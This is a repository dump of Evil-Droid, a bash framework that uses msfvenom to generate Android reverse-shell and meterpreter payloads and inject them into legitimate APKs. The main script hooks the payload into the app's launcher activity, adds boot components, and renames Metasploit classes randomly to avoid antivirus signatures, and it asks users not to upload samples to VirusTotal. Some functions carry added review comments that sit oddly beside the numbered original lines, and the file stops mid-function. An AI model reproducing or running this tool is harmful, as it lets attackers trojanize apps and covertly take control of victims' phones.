├── README.md
├── changelog
├── evil-droid
├── icons
├── cmlite.png
├── evil.png
├── fbhacker.png
├── fblite.png
├── remember.txt
└── wifi.png
└── tools
├── apktool.jar
└── doc.txt
/README.md:
--------------------------------------------------------------------------------
1 | ## Evil-Droid Framework . version 0.3
2 | Author: Mascerano Bachir [ dev-labs ]
3 |
4 | ## Legal Disclaimer:
5 | The author accepts no responsibility for misuse of this tool;
6 | remember that it is for educational purposes only.
7 |
8 | ## Description:
9 | Evil-Droid is a framework that creates, generates and embeds APK payloads to penetrate Android platforms
10 |
11 | ## Screenshot:
12 | 
13 |
14 | 
15 |
16 |
17 |
18 | ## Dependencies :
19 | 1 - metasploit-framework
20 | 2 - xterm
21 | 3 - Zenity
22 | 4 - Aapt
23 | 5 - Apktool
24 | 6 - Zipalign
25 |
26 | ## Download/Config/Usage:
27 | 1 - Download the tool from GitHub
28 | git clone https://github.com/M4sc3r4n0/Evil-Droid.git
29 |
30 | 2 - Set script execution permission
31 | cd Evil-Droid
32 | chmod +x evil-droid
33 |
34 |
35 | 4 - Run Evil-Droid Framework:
36 | ./evil-droid
37 | see options below
38 |
39 |
40 | ## video tutorial:
41 | https://www.youtube.com/watch?v=8u-NHeTdPRE&feature=share old version
42 |
--------------------------------------------------------------------------------
/changelog:
--------------------------------------------------------------------------------
1 | Running v.0.3
2 | --------
3 | - Install zipalign dependency
4 | - Detect errors and terminate services with exit mode
5 | - Fix section bypass av + change icon apk
6 | - Add new method backdoor + autodetect Smali
7 | - Fix apktool build packages apk
8 | - Adding mode running payload in the background
9 |
10 |
--------------------------------------------------------------------------------
/evil-droid:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | #
3 | # Evil-Droid Framework . version 0.3
4 | # Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform
5 | #
6 | # Created By Mascerano Bachir .
7 | # Website: http://www.dev-labs.co
8 | # YTB : https://www.youtube.com/c/mascerano%20bachir
9 | # FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
10 | #Special thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine
11 | #
12 | # this is an open source tool if you want to modify or add something . Please give me a copy.
13 |
# resize terminal window (only stdout is silenced; an error from `resize` still shows)
resize -s 40 70 > /dev/null

# Colour codes in '\e[..' form, meant to be printed with `echo -e`.
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'

# Same kind of ANSI sequences, built from an octal escape prefix.
Escape='\033'
# `white` used to be assigned twice (bold white, then the reset sequence);
# only the later value was ever visible, so that is the one kept.
white="${Escape}[0m"
RedF="${Escape}[31m"
GreenF="${Escape}[32m"
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m"
BlueF="${Escape}[34m"
CyanF="${Escape}[36m"
Reset="${Escape}[0m"
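# Check root
# Later steps in this file call apt-get and `service`, so stop here unless the
# effective user id is 0.
if [[ "$(id -u)" -ne 0 ]]; then
  # -e is required: without it the raw text of $red is printed instead of
  # being interpreted as a colour escape.
  echo -e "$red" "You must be root to run the script"
  echo
  exit 1
fi
clear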
37 | # check internet
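#######################################
# Verify outbound connectivity with a single ICMP echo to google.com.
# Globals:   yellow, red, RedF, LighGreenF (read)
# Outputs:   status line on stdout
# Returns:   0 when the ping succeeds; otherwise terminates the script with
#            status 1 (previously the failure path exited with status 0,
#            so a wrapper could not tell the check had failed).
# NOTE(review): a network that filters ICMP but allows other traffic will be
# reported as offline by this probe.
#######################################
function checkinternet()
{
  if ping -c 1 google.com > /dev/null 2>&1; then
    echo -e "$yellow" " Checking For Internet: ${LighGreenF}CONNECTED"
    return 0
  fi

  echo -e "$yellow" " Checking For Internet: ${RedF}FAILED"
  echo
  echo -e "$red" "This Script Needs An Active Internet Connection"
  echo
  echo -e "$yellow" " Evil-Droid Exit"
  echo && sleep 2
  exit 1
}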
54 | checkinternet
55 | sleep 2
56 | #Define options
57 | path=`pwd`
58 | lanip=`hostname -I`
59 | publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
60 | ver="v0.3"
61 | APKTOOL="$path/tools/apktool.jar"
62 | VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
63 | VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
64 | VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
65 | VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
66 | VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
67 | VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
68 | VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
69 | VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
70 | perms=' \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '
71 | echo ""
72 | sleep 1
73 | # spinner for Metasploit Generator
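#######################################
# Draw a green progress bar that fills in random steps until it reaches 100%.
# Purely cosmetic: it reflects no real work.
# Outputs: the bar, redrawn in place with carriage returns, on stdout
# All working variables are local so the spinner no longer overwrites
# globals named i, n, bar or barlength that a caller may be using.
#######################################
spinlong ()
{
  local bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
  local barlength=${#bar}
  local i=0
  local n
  while ((i < 100)); do
    # number of bar characters to show for the current percentage
    n=$((i*barlength / 100))
    printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
    # advance by 2..6 percent per tick
    ((i += RANDOM%5+2))
    sleep 0.02
  done
}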
86 | # detect ctrl+c exiting
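trap ctrl_c INT
#######################################
# SIGINT handler: stop the services this script may have started, then quit.
# Globals:   red, yellow (read)
# Calls:     apache_svc_stop, postgresql_stop (defined elsewhere in this file)
# Exits with 130 (128 + SIGINT) so a parent process can see the run was
# interrupted; the bare `exit` used before reported the status of the last
# echo, i.e. success.
#######################################
ctrl_c() {
  clear
  # The colour variable is expanded inside the quotes so it is never subject
  # to word splitting or pathname expansion.
  echo -e "${red}[*] (Ctrl + C ) Detected, Trying To Exit... "
  echo -e "${red}[*] Stopping Services... "
  apache_svc_stop
  postgresql_stop
  sleep 1
  echo ""
  echo -e "${yellow}[*] Thanks For Using Evil-Droid :)"
  exit 130
}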
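#detect system
echo -e "$blue"
sudo cat /etc/issue.net

#######################################
# Make sure a required command is on PATH, installing its package(s) if not.
# Arguments:
#   $1 - command to look for
#   $2 - label printed on the "found" line (includes the dot padding)
#   $3 - text printed on the "not found" line
#   $4 - display name used in the "Installing ..." line
#   $5.. - apt package(s) to install when the command is missing
# Review notes:
#   * Packages are installed as root, non-interactively (-y), from whatever
#     apt sources the host has configured.
#   * The original printed "Done installing" without looking at apt-get's
#     result; the command is now probed again and the script stops if it is
#     still missing.
#   * The Apktool and Zipalign "found" branches re-probed `aapt` (copy/paste);
#     each tool is now checked under its own name.
#   * The Metasploit branch now follows the same sequence as the other tools.
#######################################
ensure_tool() {
  local cmd=$1 found_label=$2 missing_label=$3 display=$4
  shift 4

  if command -v "$cmd" > /dev/null 2>&1; then
    echo -e "$green" "[ ✔ ] ${found_label}${LighGreenF}[ found ]"
    sleep 2
    return 0
  fi

  echo ""
  echo -e "$red" "[ X ] ${missing_label}"
  sleep 2
  echo -e "$yellow" "[ ! ] Installing ${display} "
  sleep 2
  echo -e "$green" ""

  local pkg
  for pkg in "$@"; do
    # A failed auxiliary package is reported but not fatal; the probe below
    # decides whether the tool itself is usable.
    sudo apt-get install "$pkg" -y \
      || echo -e "$red" "[ X ] apt-get failed for package: ${pkg}"
  done

  if ! command -v "$cmd" > /dev/null 2>&1; then
    echo -e "$red" "[ X ] ${display} is still missing after installation"
    exit 1
  fi
  clear
  echo -e "$blue" "[ ✔ ] Done installing .... "
}

#check dependencies existence
echo -e "$blue" ""
echo "® Checking dependencies configuration ®"
echo " "

ensure_tool msfconsole "Metasploit-Framework.............." \
  "Metasploit-Framework -> ${RedF}not found " "Metasploit-Framework" \
  metasploit-framework
ensure_tool xterm "Xterm............................." \
  "xterm -> ${RedF}not found! " "Xterm" xterm
ensure_tool zenity "Zenity............................" \
  "Zenity -> ${RedF}not found! " "Zenity" zenity
#Check for Android Asset Packaging Tool
ensure_tool aapt "Aapt.............................." \
  "Aapt -> ${RedF}not found! " "Aapt" aapt android-framework-res
#Check for Apktool Reverse Engineering
ensure_tool apktool "Apktool..........................." \
  "Apktool -> ${RedF}not found! " "Apktool" apktool
#check for zipalign
ensure_tool zipalign "Zipalign.........................." \
  "Zipalign -> ${RedF}not found! " "Zipalign" zipalign

# Output directory lives under the directory the script was started from.
directory="$path/evilapk"
if [ ! -d "$directory" ]; then
  echo "Creating the output directory..."
  # quoted so a working directory containing spaces is handled as one path
  mkdir -- "$directory"
  sleep 3
fi
echo -e "$red" "╔────────────────────────────────────────────────╗"
echo -e "$red" "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e "$red" "| Please do not upload APK to VirusTotal.com |"
echo -e "$red" "┖────────────────────────────────────────────────┙"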
221 | #function ascii banner
222 | function print_ascii_art {
223 | echo -e $lightgreen " . . "
224 | echo -e $lightgreen " M. .M "
225 | echo -e $lightgreen " MMMMMMMMMMM. "
226 | echo -e $lightgreen " .MMM\MMMMMMM/MMM. "
227 | echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. "
228 | echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM "
229 | echo -e $lightgreen " MMMMMMM.......MMMMMMM "
230 | echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
231 | echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM "
232 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
233 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
234 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
235 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
236 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
237 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
238 | echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
239 | echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM "
240 | echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
241 | echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
242 | echo -e $lightgreen " MMMMM MMMMM $ver "
243 | echo -e $lightgreen " MMMMM MMMMM "
244 | echo -e $lightgreen " MMMMM MMMMM "
245 | echo -e $lightgreen " MMMMM MMMMM "
246 | echo -e $lightgreen " .MMM. .MMM. "
247 | echo -e $lightgreen " Mascerano Bachir - Dev-labs "
248 | }
249 | #function lhost
# Ask for the listener address in a zenity entry dialog, pre-filled with the
# LAN address. The answer is stored in the global LHOST exactly as typed;
# nothing in this function validates it. zenity's stderr is discarded.
function get_lhost()
{
  local -a dialog=(
    --title="☢ SET LHOST ☢"
    --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip"
    --entry-text "$lanip"
    --entry
    --width 300
  )
  LHOST=$(zenity "${dialog[@]}" 2> /dev/null)
}
254 | #function lport
# Ask for the listener port in a zenity entry dialog (default text "4444").
# The answer is stored in the global LPORT as typed; this function does not
# check that it is numeric or in range. zenity's stderr is discarded.
function get_lport()
{
  local -a dialog=(
    --title="☢ SET LPORT ☢"
    --text "example: 4444"
    --entry-text "4444"
    --entry
    --width 300
  )
  LPORT=$(zenity "${dialog[@]}" 2> /dev/null)
}
259 | #function payload
260 | function get_payload()
261 | {
262 | PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
263 | }
264 | function get_payload1()
265 | {
266 | PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
267 | }
268 | #function name
# Ask for the output file's base name in a zenity entry dialog (default text
# "evilapk"). The answer is stored in the global apk_name as typed; no
# character filtering happens here. zenity's stderr is discarded.
function payload_name()
{
  local -a dialog=(
    --title "☢ PAYLOAD NAME ☢"
    --text "example: evilapk"
    --entry
    --entry-text "evilapk"
    --width 300
  )
  apk_name=$(zenity "${dialog[@]}" 2> /dev/null)
}
273 | #function original apk
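# Open a zenity file chooser filtered to *.apk, starting at $path, and store
# the selected file in the global `orig`. zenity's stderr is discarded.
# "$path" is quoted: unquoted, a start directory containing whitespace was
# split into several arguments and zenity received a broken --filename.
function orig_apk()
{
  orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename="$path" --file-selection --file-filter "*.apk" --text "chose the original (apk)" 2> /dev/null)
}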
278 | #function change icon
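# Open a zenity file chooser filtered to *.png, starting at $path, and store
# the selected file in the global `iconos`. zenity's stderr is discarded.
# "$path" is quoted: unquoted, a start directory containing whitespace was
# split into several arguments and zenity received a broken --filename.
function change_icon()
{
  iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename="$path" --file-selection --file-filter "*.png" --text "chose your own icon." 2> /dev/null)
}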
283 | #function generate payload
284 | function gen_payload()
285 | {
286 | echo -e $yellow ""
287 | echo "[*] Generating apk payload"
288 | spinlong
289 | xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
290 | }
291 | function embed_payload()
292 | {
293 | echo -e $yellow ""
294 | echo "[*] Embeding apk payload in orginal apk"
295 | spinlong
296 | xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
297 | }
298 | #function update apktool
299 | function up_apktook()
300 | {
301 | echo -e $yellow ""
302 | echo "[*] Removing 1.apk framework file..."
303 | spinlong
304 | apktool empty-framework-dir --force > /dev/null 2>&1
305 | }
306 | #function apktool
307 | function apk_decomp()
308 | {
309 | echo -e $yellow ""
310 | echo "[*] Decompiling Payload APK..."
311 | spinlong
312 | xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
313 | rm $apk_name.apk
314 | }
315 | function apk_comp()
316 | {
317 | echo -e $yellow ""
318 | echo "[*] Rebuilding APK file..."
319 | spinlong
320 | xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
321 | rm -r payload > /dev/null 2>&1
322 | }
323 | function apk_decomp1()
324 | {
325 | echo -e $yellow ""
326 | echo "[*] Decompiling Original APK..."
327 | spinlong
328 | xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
329 | }
330 | function apk_comp1()
331 | {
332 | echo -e $yellow ""
333 | echo "[*] Rebuilding Backdoored APK..."
334 | spinlong
335 | xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
336 | rm -r payload > /dev/null 2>&1
337 | rm -r original > /dev/null 2>&1
338 | }
339 | #function errors
# Abort helper for the rebuild step. It must be called directly after the
# command being checked, because its first action is to capture that
# command's exit status into the global rc. On a non-zero status it prints a
# failure banner, stops the apache2/postgresql services and exits with the
# same status; on zero it returns without output.
function error()
{
  rc=$?
  [ "$rc" = 0 ] && return

  echo -e $red ""
  echo "【X】 Failed to rebuild backdoored apk【X】"
  echo
  apache_svc_stop
  postgresql_stop
  exit $rc
}
# Generic abort helper. It must be called directly after the command being
# checked, because its first action is to capture that command's exit status
# into the global rc. On a non-zero status it prints an error banner, stops
# the apache2/postgresql services and exits with the same status; on zero it
# returns without output.
function error0()
{
  rc=$?
  [ "$rc" = 0 ] && return

  echo -e $red ""
  echo "【X】 An Error Was Occured .Ty Again【X】"
  echo
  apache_svc_stop
  postgresql_stop
  exit $rc
}
364 | #function apache2 service
# Start apache2 while a pulsating zenity progress window is shown.
# The function's status is that of zenity (last stage of the pipeline), so a
# failure of `service apache2 start` is not visible to the caller.
function apache_svc_start()
{
  local -a progress=(
    --progress --pulsate
    --title "PLEASE WAIT..."
    --text="Start apache2 service"
    --percentage=0 --auto-close
    --width 300
  )
  service apache2 start | zenity "${progress[@]}" > /dev/null 2>&1
}
# Stop apache2 while a pulsating zenity progress window is shown.
# The function's status is that of zenity (last stage of the pipeline), so a
# failure of `service apache2 stop` is not visible to the caller.
function apache_svc_stop()
{
  local -a progress=(
    --progress --pulsate
    --title "PLEASE WAIT..."
    --text="Stop apache2 service"
    --percentage=0 --auto-close
    --width 300
  )
  service apache2 stop | zenity "${progress[@]}" > /dev/null 2>&1
}
373 | #function postgresql service
# Start postgresql while a pulsating zenity progress window is shown.
# The function's status is that of zenity (last stage of the pipeline), so a
# failure of `service postgresql start` is not visible to the caller.
function postgresql_start()
{
  local -a progress=(
    --progress --pulsate
    --title "PLEASE WAIT..."
    --text="Start postgresql service"
    --percentage=0 --auto-close
    --width 300
  )
  service postgresql start | zenity "${progress[@]}" > /dev/null 2>&1
}
# Stop postgresql while a pulsating zenity progress window is shown.
# The function's status is that of zenity (last stage of the pipeline), so a
# failure of `service postgresql stop` is not visible to the caller.
function postgresql_stop()
{
  local -a progress=(
    --progress --pulsate
    --title "PLEASE WAIT..."
    --text="Stop postgresql service"
    --percentage=0 --auto-close
    --width 300
  )
  service postgresql stop | zenity "${progress[@]}" > /dev/null 2>&1
}
382 | # function adding permission
383 | function perms()
384 | {
385 | echo -e $yellow ""
386 | echo "[*] Adding permission and Hook Smali"
387 | spinlong
388 | package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
389 | package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
390 | tmp=$package_name
391 | sed -i "5i\ $perms" $path/original/AndroidManifest.xml
392 | rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
393 | sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
394 | cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
395 | rc=$?
396 | if [ $rc != 0 ];then
397 | app_name=`grep "&1
398 | app_dash=`grep "&1
399 | tmp=$app_name
400 | sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
401 | cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
402 | amanifest=" "
403 | boot_cmp=' \n \n \n \n '
404 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
405 | fi
406 | amanifest=" "
407 | boot_cmp=' \n \n \n \n '
408 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
409 | android_nam=$tmp
410 | }
411 | # functions hook smali
412 | function hook_smalies()
413 | {
414 | launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
415 | android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
416 | android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
417 | android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
418 | if [ $android_name ]; then
419 | echo
420 | echo "##################################################################"
421 | echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
422 | hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
423 | echo "In line:$hook_num"
424 | echo "##################################################################"
425 | starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
426 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
427 | elif [ ! -e $android_activity ]; then
428 | echo
429 | echo "##################################################################"
430 | echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
431 | hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
432 | echo "In line:$hook_num"
433 | echo "##################################################################"
434 | starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
435 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
436 | rc=$?
437 | if [ $rc != 0 ]; then
438 | spinlong
439 | echo -e $red ""
440 | echo "[x] cant find : $android_activity.smali"
441 | echo "[*] try another ..."
442 | spinlong
443 | sleep 2
444 | echo
445 | echo "##################################################################"
446 | echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
447 | hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
448 | echo "In line:$hook_num"
449 | echo "##################################################################"
450 | starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
451 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
452 | fi
453 | fi
454 | }
455 | #function flagged by av & updating smalies
456 | function flagg()
457 | {
458 | echo -e $yellow ""
459 | echo "[*] Scrubbing the payload contents to avoid AV signatures..."
460 | spinlong
461 | mv payload/smali/com/metasploit payload/smali/com/$VAR1
462 | mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
463 | mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
464 | sleep 2
465 | if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
466 | echo
467 | echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
468 | apache_svc_stop
469 | postgresql_stop
470 | exit 1
471 | fi
472 | sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
473 | sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
474 | sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
475 | sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
476 | sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
477 | sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
478 | sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
479 | sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
480 | sed -i '/WRITE_SMS/a' payload/AndroidManifest.xml
481 | }
482 | function flagg_original()
483 | {
484 | echo -e $yellow ""
485 | echo "[*] Scrubbing the payload contents to avoid AV signatures..."
486 | spinlong
487 | rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
488 | mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
489 | mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
490 | mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
491 | mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
492 | sleep 2
493 | if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
494 | echo
495 | echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
496 | apache_svc_stop
497 | postgresql_stop
498 | exit 1
499 | fi
500 | echo -e $yellow ""
501 | echo "[*] Adding permission and Hook Smali"
502 | spinlong
503 | sed -i "5i\ $perms" $path/original/AndroidManifest.xml
504 | package_name=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
505 | package_dash=`head -n 2 $path/original/AndroidManifest.xml|grep "&1
506 | tmp=$package_name
507 | sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
508 | sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
509 | sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
510 | sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
511 | cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
512 | rc=$?
513 | if [ $rc != 0 ];then
514 | app_name=`grep "&1
515 | app_dash=`grep "&1
516 | tmp=$app_name
517 | sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
518 | sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
519 | sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
520 | sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/*.smali 2>&1
521 | cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
522 | amanifest=" "
523 | boot_cmp=' \n \n \n \n '
524 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
525 | fi
526 | amanifest=" "
527 | boot_cmp=' \n \n \n \n '
528 | sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
529 | android_nam=$tmp
530 | launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
531 | android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
532 | android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
533 | android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "&1
534 | if [ $android_name ]; then
535 | echo
536 | echo "##################################################################"
537 | echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
538 | hook_num=`grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
539 | echo "In line:$hook_num"
540 | echo "##################################################################"
541 | starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
542 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
543 | elif [ ! -e $android_activity ]; then
544 | echo
545 | echo "##################################################################"
546 | echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
547 | hook_num=`grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
548 | echo "In line:$hook_num"
549 | echo "##################################################################"
550 | starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
551 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
552 | rc=$?
553 | if [ $rc != 0 ]; then
554 | spinlong
555 | echo -e $red ""
556 | echo "[x] cant find : $android_activity.smali"
557 | echo "[*] try another ..."
558 | spinlong
559 | sleep 2
560 | echo
561 | echo "##################################################################"
562 | echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
563 | hook_num=`grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
564 | echo "In line:$hook_num"
565 | echo "##################################################################"
566 | starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
567 | sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
568 | fi
569 | fi
570 | }
571 | # function chage name and icon
572 | function merge_name_ico()
573 | {
574 | echo -e $yellow ""
575 | echo "[*] Changing name and icon payload..."
576 | spinlong
577 | label=' '
578 | label1=' '
